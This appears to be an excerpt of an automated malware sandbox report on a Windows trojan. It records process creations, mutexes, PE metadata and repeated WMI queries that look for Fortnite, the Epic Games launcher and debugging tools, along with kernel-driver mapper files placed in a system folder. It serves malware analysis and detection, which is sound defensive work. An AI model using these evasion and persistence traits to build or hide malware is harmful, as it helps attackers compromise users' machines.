Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 73_2_003B3A28	73_2_003B3A28
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 73_2_003AB830	73_2_003AB830
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 73_2_00391B50	73_2_00391B50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 73_2_003ADB4B	73_2_003ADB4B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 73_2_003C8BE0	73_2_003C8BE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 73_2_003C7BE0	73_2_003C7BE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 73_2_0038ABD0	73_2_0038ABD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 73_2_003BEC60	73_2_003BEC60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 73_2_0039DDFF	73_2_0039DDFF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 73_2_00387DD0	73_2_00387DD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 73_2_003C6DCB	73_2_003C6DCB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 73_2_0038CF10	73_2_0038CF10

Source: C:\Windows\Speech\rtcore64.exe	Code function: String function: 6D06CCC0 appears 33 times
Source: C:\Windows\Speech\kdmapper.exe	Code function: String function: 00EDEB78 appears 39 times
Source: C:\Windows\Speech\kdmapper.exe	Code function: String function: 00EDF5F0 appears 31 times
Source: C:\Windows\Speech\kdmapper.exe	Code function: String function: 00EDEC50 appears 56 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: String function: 0038EBD0 appears 171 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: String function: 0038CCF0 appears 51 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 0040CBE0 appears 53 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 0040EE60 appears 145 times

Source: C:\Windows\System32\taskkill.exe

Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 460 -p 2084 -ip 2084

Source: ITDiARjW.log.161.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: QGjYUwSA.log.161.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: oLoCRyrD.log.161.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: XEXXxLMp.log.161.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970

Source: physmeme.exe.31.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: msedge.exe.52.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: winlogon.exe.161.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: rtcore64.exe.55.dr

Static PE information: Section: ZhxHw+ ZLIB complexity 1.0003276837624584

Source: ITDiARjW.log.161.dr, -.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: QGjYUwSA.log.161.dr, -.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: oLoCRyrD.log.161.dr, -.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: XEXXxLMp.log.161.dr, -.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: curl.exe, 00000037.00000003.1493418060.000002E955E60000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000037.00000003.1492915599.000002E955EBD000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000037.00000003.1492740974.000002E955EBD000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000037.00000003.1483341577.000002E955EBD000.00000004.00000020.00020000.00000000.sdmp, rtcore64.exe.55.dr

Binary or memory string: ".vbp

Source: classification engine

Classification label: mal100.troj.evad.winEXE@1457/107@33/6

Source: C:\Windows\Speech\kdmapper.exe

Code function: 52_2_00EC6C74 GetLastError,FormatMessageW,

52_2_00EC6C74

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 47_2_004345E0 CoCreateInstance,

47_2_004345E0

Source: C:\Windows\Speech\kdmapper.exe

Code function: 52_2_00EDA6C2 FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,CreateStreamOnHGlobal,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree,

52_2_00EDA6C2

Source: C:\Windows\Speech\physmeme.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\physmeme.exe.log

Jump to behavior

Source: C:\Windows\System32\WerFault.exe	Mutant created: \BaseNamedObjects\Local\SM0:8080:120:WilError_03
Source: C:\Edge\msedge.exe	Mutant created: NULL
Source: C:\Windows\System32\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess2084
Source: C:\Edge\msedge.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\JFIOSDHSUDFHUSIDGHHDJCXZCHBKLJZGVHSKDFGOIUYDSGYOIYD
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7220:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7456:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7360:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7312:120:WilError_03

Source: C:\Windows\System32\WerFault.exe

File created: C:\ProgramData\Microsoft\Windows\WER\Temp\38f46005-2bf8-4f56-87ab-0a058e61e02e

Source: C:\Windows\SysWOW64\wscript.exe

Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Edge\mikZxAokT1te3xOwV8iiWp5ACQVlwzi0DAV4VCgjFc4vhg.bat" "

Source: C:\Windows\Speech\kdmapper.exe	Command line argument: sfxname	52_2_00EDDF1E
Source: C:\Windows\Speech\kdmapper.exe	Command line argument: sfxstime	52_2_00EDDF1E
Source: C:\Windows\Speech\kdmapper.exe	Command line argument: STARTDLG	52_2_00EDDF1E

Source: UY9hUZn4CQ.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\System32\cmd.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\cmd.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "FortniteClient-Win64-Shipping.exe")
Source: C:\Windows\System32\cmd.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\cmd.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "Dbg64.exe")
Source: C:\Windows\System32\cmd.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "FortniteClient-Win64-Shipping.exe")
Source: C:\Windows\System32\cmd.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "HTTPDebuggerSvc.exe")
Source: C:\Windows\System32\cmd.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "FortniteClient-Win64-Shipping.exe")
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "HTTPDebuggerUI.exe")
Source: C:\Windows\System32\cmd.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "EpicGamesLauncher.exe")
Source: C:\Windows\System32\cmd.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "EpicGamesLauncher.exe")
Source: C:\Windows\System32\cmd.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "HTTPDebuggerUI.exe")
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "HTTPDebuggerSvc.exe")
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "FortniteClient-Win64-Shipping.exe")
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "EpicGamesLauncher.exe")
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "FortniteClient-Win64-Shipping.exe")
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "Ida64.exe")
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "EpicGamesLauncher.exe")
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\cmd.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "OllyDbg.exe")
Source: C:\Windows\Speech\imxyvi.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "EpicGamesLauncher.exe")
Source: C:\Windows\System32\cmd.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "FortniteClient-Win64-Shipping.exe")
Source: C:\Windows\System32\cmd.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "EpicGamesLauncher.exe")
Source: C:\Windows\System32\curl.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "EpicGamesLauncher.exe")
Source: C:\Windows\System32\cmd.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "FortniteClient-Win64-Shipping.exe")
Source: C:\Windows\System32\cmd.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "EpicGamesLauncher.exe")
Source: C:\Windows\System32\cmd.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "FortniteClient-Win64-Shipping.exe")
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "Dbg64.exe")
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "FortniteClient-Win64-Shipping.exe")
Source: C:\Windows\System32\cmd.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "EpicGamesLauncher.exe")
Source: C:\Windows\System32\cmd.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "FortniteClient-Win64-Shipping.exe")
Source: C:\Windows\Speech\physmeme.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "EpicGamesLauncher.exe")
Source: C:\Windows\System32\cmd.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "HTTPDebuggerUI.exe")
Source: C:\Windows\System32\cmd.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "FortniteClient-Win64-Shipping.exe")
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "Dbg32.exe")
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "FortniteClient-Win64-Shipping.exe")
Source: C:\Windows\System32\WerFault.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "OllyDbg.exe")
Source: C:\Windows\System32\WerFault.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "EpicGamesLauncher.exe")
Source: C:\Windows\System32\WerFault.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "EpicGamesLauncher.exe")
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "HTTPDebuggerSvc.exe")
Source: C:\Windows\System32\sc.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "FortniteClient-Win64-Shipping.exe")
Source: C:\Windows\System32\sc.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\sc.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "EpicGamesLauncher.exe")
Source: C:\Windows\System32\sc.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\Speech\kdmapper.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "Ida64.exe")
Source: C:\Windows\System32\cmd.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "FortniteClient-Win64-Shipping.exe")
Source: C:\Windows\System32\cmd.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "FortniteClient-Win64-Shipping.exe")
Source: C:\Windows\System32\cmd.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "EpicGamesLauncher.exe")
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "FortniteClient-Win64-Shipping.exe")
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "HTTPDebugger.exe")
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "EpicGamesLauncher.exe")
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "EpicGamesLauncher.exe")
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\Speech\rtcore64.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "EpicGamesLauncher.exe")
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "FortniteClient-Win64-Shipping.exe")
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "EpicGamesLauncher.exe")
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "EpicGamesLauncher.exe")
Source: C:\Windows\System32\cmd.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "FortniteClient-Win64-Shipping.exe")
Source: C:\Windows\System32\cmd.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "FortniteClient-Win64-Shipping.exe")
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "FortniteClient-Win64-Shipping.exe")
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "EpicGamesLauncher.exe")
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\cmd.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "FortniteClient-Win64-Shipping.exe")
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "EpicGamesLauncher.exe")
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "HTTPDebugger.exe")
